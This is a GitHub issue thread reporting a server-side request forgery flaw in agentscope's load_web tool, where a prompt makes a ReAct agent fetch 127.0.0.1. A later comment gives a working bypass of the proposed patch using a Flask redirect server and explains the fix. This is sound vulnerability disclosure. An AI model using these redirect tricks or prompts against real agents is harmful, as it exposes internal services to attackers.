agentscope icon indicating copy to clipboard operation
agentscope copied to clipboard
verified publisher icon modelscope

[Bug]: Security bug: SSRF in load_web

Open SecureMPro opened this issue 1 year ago • 2 comments

Describe the bug Security bug: SSRF in load_web

To Reproduce Hello Developer,

I have noticed that agentscope does not implement security measures to sanitize the URL in load_web, which may result in SSRF vulnerability.

For instance, when I used the following prompt to load the web content, agentscope directly request the http://127.0.0.1/:

agentscope.init(model_configs="./1.json")

service_toolkit = ServiceToolkit()
service_toolkit.add(load_web)

agent = ReActAgent(
    name="assistant",
    model_config_name="testll",
    verbose=True,
    service_toolkit=service_toolkit,
    max_iters=1,
)

msg = Msg("user", "help me to load the following website: http://127.0.0.1/", role="user")
agent(msg)

By doing so, attackers can visit the intra-website, this could seriously compromise server security. image

image

SecureMPro avatar Aug 16 '24 02:08 SecureMPro

Thanks for your attention, we will fix it as soon as possible

DavdGao avatar Aug 21 '24 02:08 DavdGao

Hello, I find the proposed patch can be simply bypassed via the HTTP redirection trick. I demo the bypass steps as follows: 1, run the following Python scripts in any external IP to deploy a HTTP redirection web server:

import os
from flask import Flask,redirect

app = Flask(__name__)

@app.route('/redirect-local-http')
def localhttp():
    return redirect("http://127.0.0.1:8080/local", code=302)

if __name__ == '__main__':
    port = int(os.environ.get('PORT', 5000))
    app.run(host='0.0.0.0', port=port)

2, run the following Python code in local IP to deploy the real target:

import os
from flask import Flask

app = Flask(__name__)

@app.route('/local')
def hello():
    return 'Hello World!'

if __name__ == '__main__':
    port = int(os.environ.get('PORT', 8080))
    app.run(host='127.0.0.1', port=port)

3, then run the agent msg = Msg("user", "help me to load the following website: http://[external IP]:5000/redirect-local-http", role="user") to bypass the propsed patch and access the internal url http://127.0.0.1:8080/local

The root cause here is the HTTP redirection can still result in response.status_code = 200 and it is necessary to use response.history to further check the redirection behaviors or set allow_redirects=False to handle the redirection progress by yourself.

zpbrent avatar Aug 23 '24 01:08 zpbrent

This issue is marked as stale because there has been no activity for 21 days. Remove stale label or add new comments or this issue will be closed in 3 day.

github-actions[bot] avatar Aug 19 '25 09:08 github-actions[bot]

Close this stale issue.

github-actions[bot] avatar Aug 23 '25 09:08 github-actions[bot]